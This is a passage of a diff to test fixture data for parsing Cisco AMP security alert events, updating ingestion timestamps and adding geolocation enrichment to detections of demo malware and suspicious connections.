@@ -576,7 +600,7 @@ }, "event": { "severity": 3, - "ingested": "2021-12-09T13:35:32.898051200Z", + "ingested": "2021-12-14T14:40:37.784981923Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6180341055704007000,\"timestamp\":1610707063,\"timestamp_nanoseconds\":978000000,\"date\":\"2021-01-15T10:37:43+00:00\",\"event_type\":\"DFC Threat Detected\",\"event_type_id\":1090519084,\"detection\":\"DFC.CustomIPList\",\"detection_id\":\"6180341055704006657\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Upatre\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"e1:e5:94:ea:a5:44\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"network_info\":{\"remote_ip\":\"67.43.156.12\",\"remote_port\":443,\"local_ip\":\"10.10.0.0\",\"local_port\":55805,\"nfm\":{\"direction\":\"Outgoing connection from\",\"protocol\":\"TCP\"},\"parent\":{\"process_id\":3136,\"disposition\":\"Clean\",\"file_name\":\"iexplore.exe\",\"identity\":{\"sha256\":\"b4e5c2775de098946b4e11aba138b89d42b88c1dbd4d5ec879ef6919bf018132\",\"sha1\":\"8de30174cebc8732f1ba961e7d93fe5549495a80\",\"md5\":\"b3581f426dc500a51091cdd5bacf0454\"}}}}}", "code": "1090519084", "kind": "alert", 
@@ -631,6 +655,18 @@
 }
 },
 "destination": {
+ "geo": {
+ "continent_name": "Asia",
+ "country_name": "Bhutan",
+ "location": {
+ "lon": 90.5,
+ "lat": 27.5
+ },
+ "country_iso_code": "BT"
+ },
+ "as": {
+ "number": 35908
+ },
 "port": 443,
 "ip": "67.43.156.12"
 },
@@ -672,7 +708,7 @@ }, "event": { "severity": 3, - "ingested": "2021-12-09T13:35:32.898057100Z", + "ingested": "2021-12-14T14:40:37.784982422Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6180341055704007000,\"timestamp\":1610707063,\"timestamp_nanoseconds\":947000000,\"date\":\"2021-01-15T10:37:43+00:00\",\"event_type\":\"DFC Threat Detected\",\"event_type_id\":1090519084,\"detection\":\"DFC.CustomIPList\",\"detection_id\":\"6180341055704006661\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Upatre\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"e1:e5:94:ea:a5:44\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"network_info\":{\"remote_ip\":\"67.43.156.12\",\"remote_port\":443,\"local_ip\":\"10.10.0.0\",\"local_port\":55809,\"nfm\":{\"direction\":\"Outgoing connection from\",\"protocol\":\"TCP\"},\"parent\":{\"process_id\":3136,\"disposition\":\"Clean\",\"file_name\":\"iexplore.exe\",\"identity\":{\"sha256\":\"b4e5c2775de098946b4e11aba138b89d42b88c1dbd4d5ec879ef6919bf018132\",\"sha1\":\"8de30174cebc8732f1ba961e7d93fe5549495a80\",\"md5\":\"b3581f426dc500a51091cdd5bacf0454\"}}}}}", "code": "1090519084", "kind": "alert", 
@@ -727,6 +763,18 @@
 }
 },
 "destination": {
+ "geo": {
+ "continent_name": "Asia",
+ "country_name": "Bhutan",
+ "location": {
+ "lon": 90.5,
+ "lat": 27.5
+ },
+ "country_iso_code": "BT"
+ },
+ "as": {
+ "number": 35908
+ },
 "port": 443,
 "ip": "67.43.156.12"
 },
@@ -768,7 +816,7 @@ }, "event": { "severity": 3, - "ingested": "2021-12-09T13:35:32.898062900Z", + "ingested": "2021-12-14T14:40:37.784983043Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6180341055704007000,\"timestamp\":1610707063,\"timestamp_nanoseconds\":931000000,\"date\":\"2021-01-15T10:37:43+00:00\",\"event_type\":\"DFC Threat Detected\",\"event_type_id\":1090519084,\"detection\":\"DFC.CustomIPList\",\"detection_id\":\"6180341055704006660\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Upatre\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"e1:e5:94:ea:a5:44\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"network_info\":{\"remote_ip\":\"67.43.156.12\",\"remote_port\":443,\"local_ip\":\"10.10.0.0\",\"local_port\":55808,\"nfm\":{\"direction\":\"Outgoing connection from\",\"protocol\":\"TCP\"},\"parent\":{\"process_id\":3136,\"disposition\":\"Clean\",\"file_name\":\"iexplore.exe\",\"identity\":{\"sha256\":\"b4e5c2775de098946b4e11aba138b89d42b88c1dbd4d5ec879ef6919bf018132\",\"sha1\":\"8de30174cebc8732f1ba961e7d93fe5549495a80\",\"md5\":\"b3581f426dc500a51091cdd5bacf0454\"}}}}}", "code": "1090519084", "kind": "alert", 
@@ -823,6 +871,18 @@
 }
 },
 "destination": {
+ "geo": {
+ "continent_name": "Asia",
+ "country_name": "Bhutan",
+ "location": {
+ "lon": 90.5,
+ "lat": 27.5
+ },
+ "country_iso_code": "BT"
+ },
+ "as": {
+ "number": 35908
+ },
 "port": 443,
 "ip": "67.43.156.12"
 },
@@ -864,7 +924,7 @@ }, "event": { "severity": 3, - "ingested": "2021-12-09T13:35:32.898068800Z", + "ingested": "2021-12-14T14:40:37.784983546Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6180341055704007000,\"timestamp\":1610707063,\"timestamp_nanoseconds\":900000000,\"date\":\"2021-01-15T10:37:43+00:00\",\"event_type\":\"DFC Threat Detected\",\"event_type_id\":1090519084,\"detection\":\"DFC.CustomIPList\",\"detection_id\":\"6180341055704006659\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Upatre\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"e1:e5:94:ea:a5:44\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"network_info\":{\"remote_ip\":\"67.43.156.12\",\"remote_port\":443,\"local_ip\":\"10.10.0.0\",\"local_port\":55807,\"nfm\":{\"direction\":\"Outgoing connection from\",\"protocol\":\"TCP\"},\"parent\":{\"process_id\":3136,\"disposition\":\"Clean\",\"file_name\":\"iexplore.exe\",\"identity\":{\"sha256\":\"b4e5c2775de098946b4e11aba138b89d42b88c1dbd4d5ec879ef6919bf018132\",\"sha1\":\"8de30174cebc8732f1ba961e7d93fe5549495a80\",\"md5\":\"b3581f426dc500a51091cdd5bacf0454\"}}}}}", "code": "1090519084", "kind": "alert", 
@@ -919,6 +979,18 @@
 }
 },
 "destination": {
+ "geo": {
+ "continent_name": "Asia",
+ "country_name": "Bhutan",
+ "location": {
+ "lon": 90.5,
+ "lat": 27.5
+ },
+ "country_iso_code": "BT"
+ },
+ "as": {
+ "number": 35908
+ },
 "port": 443,
 "ip": "67.43.156.12"
 },
@@ -960,7 +1032,7 @@ }, "event": { "severity": 3, - "ingested": "2021-12-09T13:35:32.898074700Z", + "ingested": "2021-12-14T14:40:37.784984362Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6180341055704007000,\"timestamp\":1610707063,\"timestamp_nanoseconds\":869000000,\"date\":\"2021-01-15T10:37:43+00:00\",\"event_type\":\"DFC Threat Detected\",\"event_type_id\":1090519084,\"detection\":\"DFC.CustomIPList\",\"detection_id\":\"6180341055704006658\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Upatre\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"e1:e5:94:ea:a5:44\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"network_info\":{\"remote_ip\":\"67.43.156.12\",\"remote_port\":443,\"local_ip\":\"10.10.0.0\",\"local_port\":55806,\"nfm\":{\"direction\":\"Outgoing connection from\",\"protocol\":\"TCP\"},\"parent\":{\"process_id\":3136,\"disposition\":\"Clean\",\"file_name\":\"iexplore.exe\",\"identity\":{\"sha256\":\"b4e5c2775de098946b4e11aba138b89d42b88c1dbd4d5ec879ef6919bf018132\",\"sha1\":\"8de30174cebc8732f1ba961e7d93fe5549495a80\",\"md5\":\"b3581f426dc500a51091cdd5bacf0454\"}}}}}", "code": "1090519084", "kind": "alert", 
@@ -1039,7 +1111,7 @@ }, "event": { "severity": 3, - "ingested": "2021-12-09T13:35:32.898080600Z", + "ingested": "2021-12-14T14:40:37.784984903Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":1476910664322001000,\"timestamp\":1610706778,\"timestamp_nanoseconds\":322000000,\"date\":\"2021-01-15T10:32:58+00:00\",\"event_type\":\"Cloud IOC\",\"event_type_id\":1107296274,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"start_timestamp\":1610706778,\"start_date\":\"2021-01-15T10:32:58+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Command_Line_Arguments_Meterpreter\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"27:85:29:21:67:49\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"cloud_ioc\":{\"description\":\"A named pipe was created in a manner similar to that used for local privilege escalation through named pipe impersonation. Tools such as meterpreter often use this technique to escalate to NT Authority\\\\System.\",\"short_description\":\"W32.PossibleNamedPipeImpersonation.ioc\"},\"file\":{\"disposition\":\"Clean\",\"file_name\":\"cmd.exe\",\"file_path\":\"/C:/WINDOWS/system32/cmd.exe\",\"identity\":{\"sha256\":\"935c1861df1f4018d698e8b65abfa02d7e9037d8f68ca3c2065b6ca165d44ad2\"},\"parent\":{\"disposition\":\"Clean\",\"identity\":{\"sha256\":\"69d6fff3e0a0c4d77a62b4d71e1e3a8d10d93c46782a1b05f0ec4b8919c384b9\"}}}}}", "code": "1107296274", "kind": "alert", 
@@ -1135,7 +1207,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:32.898086900Z", + "ingested": "2021-12-14T14:40:37.784985672Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533671385032557000,\"timestamp\":1610706459,\"timestamp_nanoseconds\":25000000,\"date\":\"2021-01-15T10:27:39+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533671385032556606\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}", "code": "1090519054", "kind": "alert", 
@@ -1214,7 +1286,7 @@ }, "event": { "severity": 3, - "ingested": "2021-12-09T13:35:32.898092700Z", + "ingested": "2021-12-14T14:40:37.784986299Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":1489955900329000200,\"timestamp\":1610706298,\"timestamp_nanoseconds\":329000000,\"date\":\"2021-01-15T10:24:58+00:00\",\"event_type\":\"Multiple Infected Files\",\"event_type_id\":1107296258,\"detection\":\"W32.3372C1EDAB-100.SBX.TG\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"start_timestamp\":1610706298,\"start_date\":\"2021-01-15T10:24:58+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\"},\"parent\":{\"disposition\":\"Clean\",\"identity\":{\"sha256\":\"9e1ec8b43a88e68767fd8fed2f38e7984357b3f4186d0f907e62f8b6c9ff56ad\"}}}}}", "code": "1107296258", "kind": "alert", 
@@ -1307,7 +1379,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:32.898098500Z", + "ingested": "2021-12-14T14:40:37.784986785Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533670191031648000,\"timestamp\":1610706181,\"timestamp_nanoseconds\":947000000,\"date\":\"2021-01-15T10:23:01+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533670191031648309\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}", "code": "1090519054", "kind": "alert", 
@@ -1393,7 +1465,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:32.898104400Z", + "ingested": "2021-12-14T14:40:37.784987269Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533670191031648000,\"timestamp\":1610706181,\"timestamp_nanoseconds\":926000000,\"date\":\"2021-01-15T10:23:01+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533670191031648308\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}", "code": "1090519054", "kind": "alert", 
@@ -1479,7 +1551,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:32.898110200Z", + "ingested": "2021-12-14T14:40:37.784987756Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533670191031648000,\"timestamp\":1610706181,\"timestamp_nanoseconds\":533000000,\"date\":\"2021-01-15T10:23:01+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533670191031648307\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}", "code": "1090519054", "kind": "alert", 
@@ -1560,7 +1632,7 @@ }, "event": { "severity": 3, - "ingested": "2021-12-09T13:35:32.898116100Z", + "ingested": "2021-12-14T14:40:37.784988385Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":15212386047828,\"timestamp\":1610706149,\"timestamp_nanoseconds\":0,\"date\":\"2021-01-15T10:22:29+00:00\",\"event_type\":\"Executed malware\",\"event_type_id\":1107296272,\"detection\":\"W32.B1380FD95B-100.SBX.TG\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"start_timestamp\":1610706149,\"start_date\":\"2021-01-15T10:22:29+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"file:///C%3A/ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\"},\"parent\":{\"disposition\":\"Clean\",\"identity\":{\"sha256\":\"5ad3c37e6f2b9db3ee8b5aeedc474645de90c66e3d95f8620c48102f1eba4124\"}}}}}", "code": "1107296272", "kind": "alert", 
@@ -1654,7 +1726,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:32.898122Z", + "ingested": "2021-12-14T14:40:37.784988887Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533669929038643000,\"timestamp\":1610706120,\"timestamp_nanoseconds\":973000000,\"date\":\"2021-01-15T10:22:00+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533669929038643250\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}", "code": "1090519054", "kind": "alert", 
@@ -1740,7 +1812,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:32.898127900Z", + "ingested": "2021-12-14T14:40:37.784989373Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533669929038643000,\"timestamp\":1610706120,\"timestamp_nanoseconds\":951000000,\"date\":\"2021-01-15T10:22:00+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533669929038643249\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}", "code": "1090519054", "kind": "alert", 
@@ -1826,7 +1898,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:32.898131700Z", + "ingested": "2021-12-14T14:40:37.784989875Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533669929038643000,\"timestamp\":1610706120,\"timestamp_nanoseconds\":576000000,\"date\":\"2021-01-15T10:22:00+00:00\",\"event_type\":\"Threat 